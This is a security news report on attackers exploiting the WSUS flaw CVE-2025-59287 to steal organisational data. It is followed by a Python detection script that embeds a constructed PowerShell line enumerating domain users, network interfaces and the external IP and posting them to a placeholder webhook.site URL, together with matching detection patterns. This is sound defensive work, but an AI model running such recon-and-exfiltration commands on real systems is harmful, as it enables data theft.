Hackers Exploiting Windows Server Update Services Flaw to Steal Sensitive Data from Organizations

Originally published at [Cyber Security News](https://cybersecuritynews.com/wsus-vulnerability-actively-exploited/).

A vulnerability in Windows Server Update Services (WSUS) is being actively exploited in the wild. Criminals are using it to steal sensitive data from organizations across several industries.

The flaw, tracked as [CVE-2025-59287](https://cybersecuritynews.com/microsoft-october-2025-patch-tuesday/), was first addressed in Microsoft's October 14, 2025 Patch Tuesday release; that fix proved incomplete, and Microsoft shipped an out-of-band update on October 23. Attackers began abusing the bug as soon as proof-of-concept code became publicly available on GitHub.

Sophos telemetry indicates that exploitation began on October 24, 2025, hours after a technical analysis and exploit code were released online. The threat actors targeted internet-facing WSUS servers at universities, technology companies, manufacturing firms, and healthcare organizations, primarily in the United States. Sophos has confirmed six incidents so far; security experts believe the actual number of compromised organizations is significantly higher.

> Sophos researchers have identified real-world exploitation of a newly disclosed vulnerability in Windows Server Update Services (WSUS), where threat actors are harvesting sensitive data from organizations.
> — Sophos X-Ops (@SophosXOps) [October 30, 2025](https://twitter.com/SophosXOps/status/1983880992122097745?ref_src=twsrc%5Etfw)

**How the Attacks Unfold**

The exploit targets a critical deserialization bug in WSUS: the service deserializes attacker-controlled data received over its web interface (TCP 8530/8531), which gives an unauthenticated attacker remote code execution.

Once a vulnerable server is hit, the attackers run Base64-encoded [PowerShell commands](https://cybersecuritynews.com/patchwork-apt-using-powershell-commands/) through nested cmd.exe processes spawned from the IIS worker process (w3wp.exe) that hosts the WSUS web services, so the payload runs with the worker's privileges.

![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_MkGgiI7tY_Z4kPE0jcXXyNEXi5djpCybTAIvFpkzINQd4cDAp5Qir0k-IOmrSuJ9mCTHaFGqKL9mTDRl3vx5gOycUehXu_9flZxtZW0ESk5y6ojlJMuvxOwn68bAbwXXVXgU-uKr-TSEBqgn9O32ho9gHBCvipGBm6fnwroIguF9WRadO1GpIJZ1kx2F/w640-h212/WSUS2510-fig1.webp)

The script executes silently and gathers intelligence about the target: the external IP address and port of the vulnerable host, an enumerated list of Active Directory domain users, and detailed network interface configuration. The data is then exfiltrated to webhook.site URLs controlled by the attackers.

![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRH6fqjv6tkjYvlDxbv2nH0xNpyANq1nBSus4JhmQP_Q78JgOVBwh5qt7M0W6nhGIdnQVj_55GathGxD0WQ1tp26EkAHBzhm9CAFjJrL9PZjmTAbr1QVTafOHNI6NYqhOSKvM-uGGPqlp2PawJjFb2x-DBdPwDEzHlScjI-CcgmtyLcDdxobcYRAreT-s_/s16000/WSUS2510-fig3.webp)

Sophos researchers [discovered](https://news.sophos.com/en-us/2025/10/29/windows-server-update-services-wsus-vulnerability-abused-to-harvest-sensitive-data/) four unique webhook.site URLs associated with the attacks, three of them on the platform's free service tier. Free-tier endpoints are capped at 100 requests and their request logs are publicly viewable; by reading the logs of two such URLs, the researchers observed that exploitation began at 02:53 UTC on October 24 and hit the 100-request cap by 11:32 UTC the same day.

The rapid weaponization of this [vulnerability](https://cybersecuritynews.com/cisa-threat-detections-wsus-vulnerability/) shows how quickly threat actors move on newly disclosed flaws. The indiscriminate pattern of victims suggests the attackers are scanning the internet for exposed WSUS servers and exploiting them opportunistically rather than targeting specific organizations.

According to Rafe Pilling, Director of [Threat Intelligence](https://cybersecuritynews.com/threat-intelligence-for-businesses/) at Sophos, "This activity shows that threat actors moved quickly to exploit this critical vulnerability in WSUS to collect valuable data from vulnerable organizations."

**What Organizations Should Do**

The stolen data could be used for reconnaissance, follow-on attacks, or sold to other criminals on underground marketplaces. Organizations running WSUS should immediately apply [Microsoft's security](https://cybersecuritynews.com/microsoft-update-active-directory-sync/) patches, making sure the October 23 out-of-band update is installed rather than only the October 14 release, and conduct a thorough review of their network configuration.

Identify any WSUS server interfaces exposed to the internet and restrict access to WSUS ports TCP 8530 (HTTP) and 8531 (HTTPS) to the client systems and downstream servers that genuinely require connectivity. Security teams should review IIS and process-creation logs for signs of exploitation (cmd.exe and PowerShell spawned beneath w3wp.exe, outbound connections to webhook.site) and implement network segmentation to limit lateral movement if a compromise is discovered.
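As an added example (not code from the article, from Sophos, or from Microsoft), the following Python hunt implements the log review recommended above for the chain described in the attack section: encoded PowerShell launched through nested cmd.exe processes beneath the IIS worker (w3wp.exe), decoded as UTF-16LE, and checked for the domain-user, interface, external-IP and webhook.site markers. The Sysmon Event ID 1-style records, their simplified field names, the recon script and the all-zero webhook.site token are constructed for this example and are not the real payload or real indicators.

```python
"""Hunt for encoded PowerShell descending from the WSUS IIS worker in process-creation events.

Added example; the events and payload below are constructed, not real telemetry."""
import base64
import binascii
import json
import re
from typing import Dict, Iterable, List, Optional

PS_IMAGES = {"powershell.exe", "pwsh.exe"}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; -e, -ec and -enc are the usual ones.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)[-/]e(?:c|n|nc|ncoded|ncodedc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
# Markers for the collection and exfiltration behaviour described in the article.
RECON_PATTERNS = {
    "external-ip-lookup": re.compile(r"(?i)api\.ipify\.org|ifconfig\.me|icanhazip|checkip"),
    "domain-user-enum": re.compile(r"(?i)net1?(?:\.exe)?\s+user\s+/domain|Get-ADUser"),
    "interface-enum": re.compile(r"(?i)ipconfig(?:\.exe)?\s+/all|Get-NetIPConfiguration|Get-NetIPAddress"),
    "webhook-exfil": re.compile(r"(?i)webhook\.site"),
}


def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: Base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or malformed.
    The payload is UTF-16LE, not UTF-8; decoding it as UTF-8 yields garbage."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestor_chain(event: Dict[str, str], by_guid: Dict[str, Dict[str, str]], max_depth: int = 6) -> List[str]:
    """Follow ParentProcessGuid links; returns ancestor image names, nearest parent first."""
    chain: List[str] = []
    guid = event.get("ParentProcessGuid")
    while guid in by_guid and len(chain) < max_depth:
        parent = by_guid[guid]
        chain.append(basename(parent["Image"]))
        guid = parent.get("ParentProcessGuid")
    return chain


def hunt(events: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """Flag encoded PowerShell that descends from w3wp.exe (which hosts the WSUS web services)
    or whose decoded script carries the recon/exfil markers."""
    events = list(events)
    by_guid = {e["ProcessGuid"]: e for e in events}
    findings: List[Dict[str, object]] = []
    for e in events:
        if basename(e["Image"]) not in PS_IMAGES:
            continue
        script = decode_encoded_command(e.get("CommandLine", ""))
        if script is None:
            continue
        chain = ancestor_chain(e, by_guid)
        from_iis = "w3wp.exe" in chain
        indicators = [name for name, rx in RECON_PATTERNS.items() if rx.search(script)]
        if not (from_iis or indicators):
            continue  # e.g. an administrator's encoded one-liner started from explorer.exe
        findings.append({
            "process_guid": e["ProcessGuid"],
            "from_iis_worker": from_iis,
            "ancestors": chain,
            "indicators": indicators,
            "severity": "high" if from_iis and indicators else "medium",
            "decoded_script": script,
        })
    return findings


# Constructed recon/exfil script modelled on the described behaviour (not the real payload);
# the webhook.site token is an all-zero placeholder.
RECON_SCRIPT = (
    "$ip = Invoke-RestMethod -Uri 'https://api.ipify.org'; "
    "$users = net user /domain; $ifaces = ipconfig /all; "
    "Invoke-WebRequest -Method POST -Uri 'https://webhook.site/00000000-0000-0000-0000-000000000000' "
    "-Body (($ip, $users, $ifaces) | Out-String)"
)
PS_CMD = "powershell.exe -nop -w hidden -enc " + encode_command(RECON_SCRIPT)

# Constructed Sysmon Event ID 1-style records: w3wp.exe -> cmd.exe -> cmd.exe -> powershell.exe, plus a benign control.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ProcessGuid": "w3wp-1", "ParentProcessGuid": "svchost-1",
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe", "CommandLine": 'w3wp.exe -ap "WsusPool"'},
    {"ProcessGuid": "cmd-1", "ParentProcessGuid": "w3wp-1",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c cmd.exe /c " + PS_CMD},
    {"ProcessGuid": "cmd-2", "ParentProcessGuid": "cmd-1",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c " + PS_CMD},
    {"ProcessGuid": "ps-1", "ParentProcessGuid": "cmd-2",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine": PS_CMD},
    {"ProcessGuid": "ps-2", "ParentProcessGuid": "explorer-1",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -EncodedCommand " + encode_command("Get-Date")},
    {"ProcessGuid": "explorer-1", "ParentProcessGuid": "userinit-1",
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
]

if __name__ == "__main__":
    print(json.dumps(hunt(SAMPLE_EVENTS), indent=2))
```

Run against exported Sysmon or 4688 events (with command-line auditing enabled) by mapping your fields onto `ProcessGuid`, `ParentProcessGuid`, `Image` and `CommandLine`. The ancestor walk matters because a single event only carries its direct parent: here the PowerShell parent is cmd.exe, and only the grandparent chain reveals w3wp.exe. Any encoded PowerShell beneath the WSUS application pool is worth a look even when the decoded script matches none of the markers, which is why `from_iis_worker` alone produces a finding.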
